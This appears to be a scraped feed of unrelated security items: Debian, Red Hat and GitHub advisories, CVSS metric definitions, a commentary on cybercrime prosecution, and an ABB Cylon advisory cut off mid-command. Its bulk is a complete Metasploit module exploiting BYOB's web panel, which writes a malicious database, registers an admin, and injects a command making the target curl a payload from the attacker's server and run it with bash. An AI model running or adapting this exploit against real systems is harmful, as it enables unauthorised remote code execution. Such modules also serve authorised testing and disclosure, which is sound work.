TA866 (also known as Asylum Ambuscade) is a threat actor that has been conducting intrusion operations since at least 2020.

Highlighting TA866/Asylum Ambuscade Activity Since 2021

Debian Linux Security Advisory 5795-1 - Cedric Krier discovered that python-sql, a library to write SQL queries in a pythonic way, performed insufficient sanitizing which could result in SQL injection.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5795-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffOctober 21, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : python-sqlCVE ID         : CVE-2024-9774Cedric Krier discovered that python-sql, a library to write SQL queriesin a pythonic way, performed insufficient sanitising which could resultin SQL injection.For the stable distribution (bookworm), this problem has been fixed inversion 1.4.0-1+deb12u1.We recommend that you upgrade your python-sql packages.For the detailed security status of python-sql please refer toits security tracker page at:https://security-tracker.debian.org/tracker/python-sqlFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmcWnkYACgkQEMKTtsN8TjYrzBAAtMjk7yF0IB4onUZ+GHMkYCDoPhZRaZft7eQUAGya1/IHpuA4e5KvmWahJK8D1glflGgopSLhLSkPkXWij3LqKjb2obuqRB9icuEl1mKWeJoovHWONZLCUVSt0iPtAvLA4jIi4KpHRfzFY4QbpkkAKXAjTLjxtjDlmEky4PT+1puHAi7lQ7O2/OY/haxnVYHtoHID+E6r0eTgXq5HX9723niVkxKpjcZz8ki8WeDoEmNUOj4j89Nke0VeQNFYmCuWtAQLvRFTSL4I9fGWcRBWWEHm46YqnktlJIHVe2f9posYCMMFxvFwNo70U3MUinCDAXX6VmeAGuzTXGQAPXW0kDT7Y436ononkFcnVMoiCr/T/+m3UKUw+2iINEcnMe/G/4wkhiYx7T2YYFmJ4vRgye7sSE4YfRl6/wl/rbeVfz3AfM/iAxp7uWAlzVLry4mL1ZkNhAhvTDCpEIsBECDp1gX2z4ZVLqHDqXIqQ+IEEFIZoNImUo/LIgKvZIg18XuP77K29UAnonUe1qxf8d19nRwD18hwoQG1KL6dCRgKhE+OKjTRCZv+9hb1Xp7QagQviZTCnP+36HFtpNfbim/JlAtllEZrUdufBcMzAVx82C9oVHd8WigI+PWGSFnh5qzy0B1xhX7H3x5zLaVO1HJ6ZHzyH5VcfCFSxmzV6MeyzFk==Xlam-----END PGP SIGNATURE-----

Debian Security Advisory 5795-1

Helper is an enumerator written in PHP that helps identify directories on webservers that could be targets for things like cross site scripting, local file inclusion, remote shell upload, and remote SQL injection vulnerabilities.

Helper 0.1

Funadmin 5.0.2 is vulnerable to SQL Injection via the selectFields parameter in the index method of \app\backend\controller\auth\Auth.php.

**Exploitability Metrics**

Attack Vector: This metric reflects the context by which vulnerability exploitation is possible. This metric value (and consequently the resulting severity) will be larger the more remote (logically, and physically) an attacker can be in order to exploit the vulnerable system. The assumption is that the number of potential attackers for a vulnerability that could be exploited from across a network is larger than the number of potential attackers that could exploit a vulnerability requiring physical access to a device, and therefore warrants a greater severity.

Attack Complexity: This metric captures measurable actions that must be taken by the attacker to actively evade or circumvent existing built-in security-enhancing conditions in order to obtain a working exploit. These are conditions whose primary purpose is to increase security and/or increase exploit engineering complexity. A vulnerability exploitable without a target-specific variable has a lower complexity than a vulnerability that would require non-trivial customization. This metric is meant to capture security mechanisms utilized by the vulnerable system.

Attack Requirements: This metric captures the prerequisite deployment and execution conditions or variables of the vulnerable system that enable the attack. These differ from security-enhancing techniques/technologies (ref Attack Complexity) as the primary purpose of these conditions is not to explicitly mitigate attacks, but rather, emerge naturally as a consequence of the deployment and execution of the vulnerable system.

Privileges Required: This metric describes the level of privileges an attacker must possess prior to successfully exploiting the vulnerability. The method by which the attacker obtains privileged credentials prior to the attack (e.g., free trial accounts), is outside the scope of this metric. Generally, self-service provisioned accounts do not constitute a privilege requirement if the attacker can grant themselves privileges as part of the attack.

User interaction: This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable system. This metric determines whether the vulnerability can be exploited solely at the will of the attacker, or whether a separate user (or user-initiated process) must participate in some manner.

**Vulnerable System Impact Metrics**

Confidentiality: This metric measures the impact to the confidentiality of the information managed by the VULNERABLE SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.

Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the VULNERABLE SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).

Availability: This metric measures the impact to the availability of the VULNERABLE SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.

**Subsequent System Impact Metrics**

Confidentiality: This metric measures the impact to the confidentiality of the information managed by the SUBSEQUENT SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.

Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the SUBSEQUENT SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).

Availability: This metric measures the impact to the availability of the SUBSEQUENT SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.

GHSA-7pp4-388x-2xqj: SQL injection in funadmin

The SQL Expressions experimental feature of Grafana allows for the evaluation of `duckdb` queries containing user input. These queries are insufficiently sanitized before being passed to `duckdb`, leading to a command injection and local file inclusion vulnerability. Any user with the VIEWER or higher permission is capable of executing this attack.  The `duckdb` binary must be present in Grafana's $PATH for this attack to function; by default, this binary is not installed in Grafana distributions.

GHSA-q99m-qcv4-fpm7: Grafana Command Injection And Local File Inclusion Via Sql Expressions

Red Hat Security Advisory 2024-7944-03 - Red Hat OpenShift Container Platform release 4.16.17 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include a remote SQL injection vulnerability.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_7944.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: OpenShift Container Platform 4.16.17 security update  
Advisory ID:        RHSA-2024:7944-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:7944  
Issue date:         2024-10-16  
Revision:           03  
CVE Names:          CVE-2024-27289  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.16.17 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.16.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

RRed Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.16.17. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHBA-2024:7947

Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.16/release_notes/ocp-4-16-release-notes.html

Security Fix(es):

* pgx: SQL Injection via Line Comment Creation (CVE-2024-27289)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

All OpenShift Container Platform 4.16 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.16/updating/updating_a_cluster/updating-cluster-cli.html

Solution:

CVEs:

CVE-2024-27289

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2268465  
https://issues.redhat.com/browse/OCPBUGS-33673  
https://issues.redhat.com/browse/OCPBUGS-37615  
https://issues.redhat.com/browse/OCPBUGS-38458  
https://issues.redhat.com/browse/OCPBUGS-39017  
https://issues.redhat.com/browse/OCPBUGS-39379  
https://issues.redhat.com/browse/OCPBUGS-41256  
https://issues.redhat.com/browse/OCPBUGS-41293  
https://issues.redhat.com/browse/OCPBUGS-41334  
https://issues.redhat.com/browse/OCPBUGS-41551  
https://issues.redhat.com/browse/OCPBUGS-42342  
https://issues.redhat.com/browse/OCPBUGS-42431  
https://issues.redhat.com/browse/OCPBUGS-42720

Red Hat Security Advisory 2024-7944-03

Challenges with cybercrime prosecution are making it easier for attackers to act with impunity. Law enforcement needs to catch up.

Source: Tero Vesalainen via Alamy Stock Photo

COMMENTARY

Historically, cybercriminals have always had an edge over law enforcement. It may take a few hours to steal thousands of credit cards after exploiting a SQL injection flaw, but the subsequent investigation and prosecution of the cybercriminals can take years — and still fail.

Europol described the challenges in investigating and prosecuting cybercrime — the collection and preservation of digital evidence, difficulty tracing and identifying attackers, and legal and judicial hurdles associated with cross-border investigations — back in 2019. These challenges remain relevant in 2024.

**Challenges That Law Enforcement Faces**

While many countries have one or more specialized law enforcement agencies (LEAs) or police units capable of investigating cybercrime, the general trend is to commingle computer-enabled crimes (cybercrimes) with cyberattacks and send them all to a single agency.

Cybercrimes, which include online dating scams and other types of digital fraud that rely on social engineering, cause damages ranging from 100 to several thousand dollars. Compare that with cyberattacks — which require fairly advanced tech skills and resources from cyber gangs — such as ransomware attacks on critical national infrastructure and advanced persistent threats aimed at stealthily stealing valuable trade secrets from large companies or classified information from governmental agencies. When a single agency is tasked with handling all types of digital crimes, it is unsurprising that just the initial triage of incoming cases can consume virtually all agency resources.

In contrast to overwhelmed LEAs dealing with all kinds of tasks simultaneously using extremely modest resources, modern cyber gangs usually have narrow specializations, such as vulnerability research and exploit development, where they truly excel technically and financially. Cyber mercenaries may use breached LEAs as proxies to attack other systems and slow down investigations, while state-backed groups may exploit backdoored LEAs for perfidious attacks trying to frame their political enemies. On the Dark Web, the number of announcements selling access to backdoored LEA systems or networks is steadily growing.

Despite national security being a hot topic for lawmakers on both sides of the Atlantic — and the increased funding that attention brings — specialized LEAs or units dedicated to tackling cybercrime still remain underfunded compared to their highly sophisticated, extraordinarily well-prepared, and well-funded adversaries.

Insufficient funding makes it harder to attract talented individuals to work on defense. In Western countries, state agencies struggle to compete with the deep-pocketed private sector for talented cybersecurity professionals, who can be swayed by perks unavailable to most government employees, such as higher salaries, longer leaves, and working from home. The situation is even worse in other countries: Young graduates with good technical skills can earn their annual salaries in a couple of weeks working for cybercrime conglomerates that actively prospect and recruit new members. In January 2024, FBI director Christopher Wray estimated that the number of hackers in China outnumbers all available FBI cyber personnel by at least 50 to 1.

Likewise, forensic tools and special equipment designed to bypass encryption on mobile devices or acquire digital evidence from a multicloud environment are also quite expensive, oftentimes being affordable only to leading national agencies or central forensic labs that serve thousands of requests from an entire country. As a result, a backlog of cybercrime investigations is building relentlessly, undermining people's trust in their government's capacity to protect their privacy and property on the Internet.

**Advantages for the Cyber Gangs**

International collaboration and judicial assistance in cybercrime investigation has never been simple. The Budapest Convention of 2001 is probably the most important international treaty designed to combat cross-border cybercrime. But even after the enactment of the Second Additional Protocol, the convention has fallen short of its original goals for political and organizational reasons. The recently proposed UN Treaty on Cybercrime is unlikely to do much better amid the unfolding geopolitical crises and the weakening force of international law.

The problem is that some countries, even after ratifying a treaty, are very selective when complying with the underlying duties and obligations owed to other signatories. They frequently ignore or simply delay required actions to the extent that, by the time they're finally performed, they are worthless — for instance, seizing volatile digital evidence several years after receiving a mutual legal assistance (MLAT) request from another sovereign state.

Indeed, some countries are considered safe harbors for cyber gangs that cooperate with, or work for, the government. These barons enjoy a luxurious lifestyle, safe in the knowledge that they will never be prosecuted domestically, let alone extradited, for cybercrimes that do not conflict with state public policy. Such cybercrime havens create a strong feeling of impunity among perpetrators, who believe — usually accurately — that they are above the law. Even if they are apprehended, cybercriminals usually get lenient punishments for the financial damage caused, compared to the decades-long and even life sentences for leaders of drug cartels or masterminds of Ponzi schemes.

Alarmingly, as the World Economic Forum reports, cybercrime has started to merge with organized and violent crime — for example, exploiting forced labor to staff large-scale online fraud and extortion campaigns.

**How Law Enforcement Can Make Up Ground**

To win against the seemingly invincible cybercrime hydra, governments should better organize their national cybercrime LEAs. Here's what they need to do:

*   Create specialization and internal segmentation.
    
*   Allocate additional funding to these agencies.
    
*   Form more public-private partnerships to jointly trace and dismantle cyber gangs.
    
*   Revise national legislation, including sentencing guidelines, for cybercrimes to boost the deterrence effect.
    

Otherwise, in a few years, the Internet may become an uncontrollable zone of lawlessness and chaos, co-managed by rival cyber gangs.

For a longer version of this article, please contact the author.

**About the Author**

Partner, Platt Law

Dr. Ilia Kolochenko is a Swiss expert in cybersecurity, cybercrime investigation, and cyber law. He is also a lawyer admitted to the DC Bar in Washington, DC. His legal practice is mainly focused on data protection, privacy, and cybersecurity law. Dr. Ilia Kolochenko currently serves as a Chief Architect and CEO at ImmuniWeb, a global application security company headquartered in Geneva, Switzerland. He is also a Partner & Cybersecurity Practice Lead at a US law firm with offices in New York and Washington. As part of his academic activities, Dr. Kolochenko is an Adjunct Professor of Cybersecurity Practice & Cyber Law at Capitol Technology University in Maryland, and a Faculty Member at the DC Bar Continuous Legal Education (CLE) Program, where he teaches a cybersecurity and privacy course for lawyers and other legal and judicial professionals.

Dr. Ilia Kolochenko has an LL.M. (Master of Laws) degree in Information Technology Law from the University of Edinburgh Law School, an M.Sc. in Criminal Justice (Cybercrime Investigations & Cybersecurity) from Boston University, and a Ph.D. in Computer Science from Capitol Technology University. He currently completes an advanced LL.M. in Cyber, Information and National Security (CINS) at George Mason University, Antonin Scalia Law School.

He is a Fellow of Information Privacy (FIP) and a Privacy Law Specialist (PLS) at the International Association of Privacy Professionals (IAPP), two most advanced credentials in privacy practice and privacy law by the IAPP, respectively, while also holding AIGP, CIPP/A, CIPP/C, CIPP/E, CIPP/US, CIPM, and CIPT privacy certifications. Additionally, he earned numerous offensive and defensive security certifications by the Global Information Assurance Certification (GIAC) after ongoing training in advanced cloud security, cyber operations, and investigations at SANS Institute.

Dr. Ilia Kolochenko currently serves a Vice-Chair of the Information Security Committee at the American Bar Association (ABA), also being a Fellow at the European Law Institute (ELI) and a Member of the Cybercrime Investigation & Cybersecurity (CIC) Center at Boston University. Additionally, Dr. Kolochenko is part of the Europol's Data Protection Experts Network (EDEN), INTERPOL's Digital Forensics Expert Group (DFEG), National Association of Criminal Defense Lawyers (NACDL), SANS CISO Network, and the EU CyberNet.

Dr. Ilia Kolochenko has authored over 75 articles on cybersecurity, computer crime investigations, cyber law, and artificial intelligence. His interviews and expert comments have been published in over 250 media across Europe and the US; he is also a frequent lecturer at cybersecurity, law enforcement, and legal conferences around the globe.

Cyber Gangs Aren't Afraid of Prosecution

This Metasploit module exploits two vulnerabilities in the BYOB (Build Your Own Botnet) web GUI. It leverages an unauthenticated arbitrary file write that allows modification of the SQLite database, adding a new admin user. It also uses an authenticated command injection in the payload generation page. These vulnerabilities remain unpatched.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'sqlite3'class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::HttpServer  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'BYOB Unauthenticated RCE via Arbitrary File Write and Command Injection (CVE-2024-45256, CVE-2024-45257)',        'Description' => %q{          This module exploits two vulnerabilities in the BYOB (Build Your Own Botnet) web GUI:          1. CVE-2024-45256: Unauthenticated arbitrary file write that allows modification of the SQLite database, adding a new admin user.          2. CVE-2024-45257: Authenticated command injection in the payload generation page.          These vulnerabilities remain unpatched.        },        'Author' => [          'chebuya',          # Discoverer and PoC          'Valentin Lobstein' # Metasploit module        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2024-45256'],          ['CVE', '2024-45257'],          ['URL', 'https://blog.chebuya.com/posts/unauthenticated-remote-command-execution-on-byob/']        ],        'Platform' => %w[unix linux],        'Arch' => %w[ARCH_CMD],        'Targets' => [          [            'Unix/Linux Command Shell', {              'Platform' => %w[unix linux],              'Arch' => ARCH_CMD,              'Privileged' => true              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp            }          ]        ],        'DisclosureDate' => '2024-08-15',        'DefaultTarget' => 0,        'DefaultOptions' => { 'SRVPORT' => 5000 },        'Notes' => {          'Stability' => [CRASH_SAFE],          'SideEffects' => [IOC_IN_LOGS],          'Reliability' => [REPEATABLE_SESSION]        }      )    )    register_options(      [        OptString.new('USERNAME', [false, 'Username for new admin', 'admin']),        OptString.new('PASSWORD', [false, 'Password for new admin', nil])      ]    )  end  def primer    add_resource('Path' => '/', 'Proc' => proc { |cli, req| on_request_uri_payload(cli, req) })    print_status('Payload is ready at /')  end  def on_request_uri_payload(cli, request)    handle_request(cli, request, payload.encoded)  end  def handle_request(cli, request, response_payload)    print_status("Received request at: #{request.uri} - Client Address: #{cli.peerhost}")    case request.uri    when '/'      print_status("Sending response to #{cli.peerhost} for /")      send_response(cli, response_payload)    else      print_error("Request for unknown resource: #{request.uri}")      send_not_found(cli)    end  end  def check    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path),      'keep_cookies' => true    })    if res      doc = res.get_html_document      unless doc.at('title')&.text&.include?('Build Your Own Botnet') || doc.at('meta[name="description"]')&.attr('content')&.include?('Build Your Own Botnet')        return CheckCode::Safe('The target does not appear to be BYOB.')      end    else      return CheckCode::Unknown('The target did not respond to the initial check.')    end    print_good('The target appears to be BYOB.')    random_data = Rex::Text.rand_text_alphanumeric(32)    random_filename = Rex::Text.rand_text_alphanumeric(16)    random_owner = Rex::Text.rand_text_alphanumeric(8)    random_module = Rex::Text.rand_text_alphanumeric(6)    random_session = Rex::Text.rand_text_alphanumeric(6)    form_data = {      'data' => random_data,      'filename' => random_filename,      'type' => 'txt',      'owner' => random_owner,      'module' => random_module,      'session' => random_session    }    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'api', 'file', 'add'),      'ctype' => 'application/x-www-form-urlencoded',      'vars_post' => form_data,      'keep_cookies' => true    })    if res&.code == 500      return CheckCode::Vulnerable    else      case res&.code      when 200        return CheckCode::Safe      when nil        return CheckCode::Unknown('The target did not respond.')      else        return CheckCode::Unknown("The target responded with HTTP status #{res.code}")      end    end  end  def get_csrf(path)    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, path),      'keep_cookies' => true    })    fail_with(Failure::UnexpectedReply, 'Could not retrieve CSRF token') unless res    csrf_token = res.get_html_document.at_xpath("//input[@name='csrf_token']/@value")&.text    fail_with(Failure::UnexpectedReply, 'CSRF token not found') if csrf_token.nil?    csrf_token  end  def register_user(username, password)    csrf_token = get_csrf('register')    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'register'),      'ctype' => 'application/x-www-form-urlencoded',      'vars_post' => {        'csrf_token' => csrf_token,        'username' => username,        'password' => password,        'confirm_password' => password,        'submit' => 'Sign Up'      },      'keep_cookies' => true    })    if res.nil?      fail_with(Failure::UnexpectedReply, 'No response from the server.')    elsif res.code == 302      print_good('Registered user!')    else      fail_with(Failure::UnexpectedReply, "User registration failed: #{res.code}")    end  end  def login_user(username, password)    csrf_token = get_csrf('login')    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'login'),      'ctype' => 'application/x-www-form-urlencoded',      'vars_post' => {        'csrf_token' => csrf_token,        'username' => username,        'password' => password,        'submit' => 'Log In'      },      'keep_cookies' => true    })    if res.nil?      fail_with(Failure::UnexpectedReply, 'No response from the server.')    elsif res.code == 302      print_good('Logged in successfully!')    else      fail_with(Failure::UnexpectedReply, "Login failed: #{res.code}")    end  end  def generate_malicious_db    mem_db = SQLite3::Database.new(':memory:')    mem_db.execute <<-SQL            CREATE TABLE user (            id INTEGER NOT NULL,            username VARCHAR(32) NOT NULL,            password VARCHAR(60) NOT NULL,            joined DATETIME NOT NULL,            bots INTEGER,            PRIMARY KEY (id),            UNIQUE (username)            );    SQL    mem_db.execute <<-SQL            CREATE TABLE session (            id INTEGER NOT NULL,            uid VARCHAR(32) NOT NULL,            online BOOLEAN NOT NULL,            joined DATETIME NOT NULL,            last_online DATETIME NOT NULL,            public_ip VARCHAR(42),            local_ip VARCHAR(42),            mac_address VARCHAR(17),            username VARCHAR(32),            administrator BOOLEAN,            platform VARCHAR(5),            device VARCHAR(32),            architecture VARCHAR(2),            latitude FLOAT,            longitude FLOAT,            new BOOLEAN NOT NULL,            owner VARCHAR(120) NOT NULL,            PRIMARY KEY (uid),            UNIQUE (uid),            FOREIGN KEY(owner) REFERENCES user (username)            );    SQL    mem_db.execute <<-SQL            CREATE TABLE payload (            id INTEGER NOT NULL,            filename VARCHAR(34) NOT NULL,            operating_system VARCHAR(3),            architecture VARCHAR(14),            created DATETIME NOT NULL,            owner VARCHAR(120) NOT NULL,            PRIMARY KEY (id),            UNIQUE (filename),            FOREIGN KEY(owner) REFERENCES user (username)            );    SQL    mem_db.execute <<-SQL            CREATE TABLE exfiltrated_file (            id INTEGER NOT NULL,            filename VARCHAR(4096) NOT NULL,            session VARCHAR(15) NOT NULL,            module VARCHAR(15) NOT NULL,            created DATETIME NOT NULL,            owner VARCHAR(120) NOT NULL,            PRIMARY KEY (id),            UNIQUE (filename),            FOREIGN KEY(owner) REFERENCES user (username)            );    SQL    mem_db.execute <<-SQL            CREATE TABLE task (            id INTEGER NOT NULL,            uid VARCHAR(32) NOT NULL,            task TEXT,            result TEXT,            issued DATETIME NOT NULL,            completed DATETIME,            session VARCHAR(32) NOT NULL,            PRIMARY KEY (id),            UNIQUE (uid),            FOREIGN KEY(session) REFERENCES session (uid)            );    SQL    base64_data = Tempfile.open('database.db') do |file|      src_db = SQLite3::Database.new(file.path)      backup = SQLite3::Backup.new(src_db, 'main', mem_db, 'main')      backup.step(-1)      backup.finish      binary_data = File.binread(file.path)      Rex::Text.encode_base64(binary_data)    end    base64_data  end  def upload_database_multiple_paths    successful_paths = []    filepaths = [      '/proc/self/cwd/buildyourownbotnet/database.db',      '/proc/self/cwd/../buildyourownbotnet/database.db',      '/proc/self/cwd/../../../../buildyourownbotnet/database.db',      '/proc/self/cwd/instance/database.db',      '/proc/self/cwd/../../../../instance/database.db',      '/proc/self/cwd/../instance/database.db'    ]    filepaths.each do |filepath|      form_data = {        'data' => @encoded_db,        'filename' => filepath,        'type' => 'txt',        'owner' => Faker::Internet.username,        'module' => Faker::App.name.downcase,        'session' => Faker::Alphanumeric.alphanumeric(number: 8)      }      res = send_request_cgi(        'method' => 'POST',        'uri' => normalize_uri(target_uri.path, 'api', 'file', 'add'),        'ctype' => 'application/x-www-form-urlencoded',        'vars_post' => form_data,        'keep_cookies' => true      )      successful_paths << filepath if res&.code == 200    end    successful_paths  end  def on_new_session(session)    if session.type == 'meterpreter'      binary_content = Rex::Text.decode_base64(@encoded_db)      print_status('Restoring the database via Meterpreter to avoid leaving traces.')      successful_restore = false      @successful_paths.each do |remote_path|        remote_file = session.fs.file.new(remote_path, 'wb')        remote_file.syswrite(binary_content)        remote_file.close        successful_restore = true      end      if successful_restore        print_good('Database has been successfully restored to its clean state.')      else        print_error('Failed to restore the database on all attempted paths, but proceeding with the exploitation.')      end    else      print_error('This is not a Meterpreter session. Cannot proceed with database reset, but exploitation continues.')    end  end  def exploit    # Start necessary services and perform initial setup    start_service    primer    # Define or generate admin credentials    username = datastore['USERNAME'] || 'admin'    password = datastore['PASSWORD'] || Rex::Text.rand_text_alphanumeric(12)    # Generate and upload the malicious SQLite database    print_status('Generating malicious SQLite database.')    @encoded_db = generate_malicious_db    @successful_paths = upload_database_multiple_paths    if @successful_paths.empty?      fail_with(Failure::UnexpectedReply, 'Failed to upload the database from all known paths')    else      print_good("Malicious database uploaded successfully to the following paths: #{@successful_paths.join(', ')}")    end    # Register the new admin user    print_status("Registering a new admin user: #{username}:#{password}")    register_user(username, password)    # Log in with the newly created admin user    print_status('Logging in with the new admin user.')    login_user(username, password)    # Prepare the malicious payload and inject it via command injection    print_status('Injecting payload via command injection.')    uri = get_uri.gsub(%r{^https?://}, '').chomp('/')    random_filename = ".#{Rex::Text.rand_text_alphanumeric(rand(3..5))}"    malicious_filename = "curl$IFS-k$IFS@#{uri}$IFS-o$IFS#{random_filename}&&bash$IFS#{random_filename}"    payload_data = {      'format' => 'exe',      'operating_system' => "nix$(#{malicious_filename})",      'architecture' => 'amd64'    }    # Send the command injection request    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'api', 'payload', 'generate'),      'ctype' => 'application/x-www-form-urlencoded',      'vars_post' => payload_data,      'keep_cookies' => true    }, 5)    # Keep the web server running to maintain the service    service.wait  endend

BYOB Unauthenticated Remote Code Execution

ABB Cylon Aspect version 3.08.01 suffers from an unauthenticated configuration download vulnerability. This can be exploited to download the SQLite DB that contains the configuration mappings information via the FTControlServlet by directly calling the mapConfigurationDownload.php script.

    ABB Cylon Aspect 3.08.01 (mapConfigurationDownload.php) Config DownloadVendor: ABB Ltd.Product web page: https://www.global.abbAffected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio                  Firmware: <=3.08.01Summary: ASPECT is an award-winning scalable building energy managementand control solution designed to allow users seamless access to theirbuilding data through standard building protocols including smart devices.Desc: The ABB BMS/BAS controller suffers from an unauthenticated configurationdownload vulnerability. This can be exploited to download the SQLite DB thatcontains the configuration mappings information via the FTControlServlet bydirectly calling the mapConfigurationDownload.php script.Tested on: GNU/Linux 3.15.10 (armv7l)           GNU/Linux 3.10.0 (x86_64)           GNU/Linux 2.6.32 (x86_64)           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz           PHP/7.3.11           PHP/5.6.30           PHP/5.4.16           PHP/4.4.8           PHP/5.3.3           AspectFT Automation Application Server           lighttpd/1.4.32           lighttpd/1.4.18           Apache/2.2.15 (CentOS)           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2024-5843Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5843.php21.04.2024--$ cat project                 P   R   O   J   E   C   T                        .|                        | |                        |'|            ._____                ___    |  |            |.   |' .---"|        _    .-'   '-. |  |     .--'|  ||   | _|    |     .-'|  _.|  |    ||   '-__  |   |  |    ||      |     |' | |.    |    ||       | |   |  |    ||      | ____|  '-'     '    ""       '-'   '-.'    '`      |____░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░          ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░          ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░          ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ $ curl -A 